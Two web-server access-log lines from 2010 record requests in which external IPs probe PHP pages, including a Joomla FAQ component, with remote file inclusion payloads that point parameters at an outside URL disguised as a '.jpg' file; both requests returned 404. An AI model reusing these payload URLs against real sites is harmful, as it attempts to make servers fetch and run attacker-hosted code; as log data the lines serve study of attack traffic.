218.38.136.125 - - [07/Feb/2010:09:18:19 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:09:18:32 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
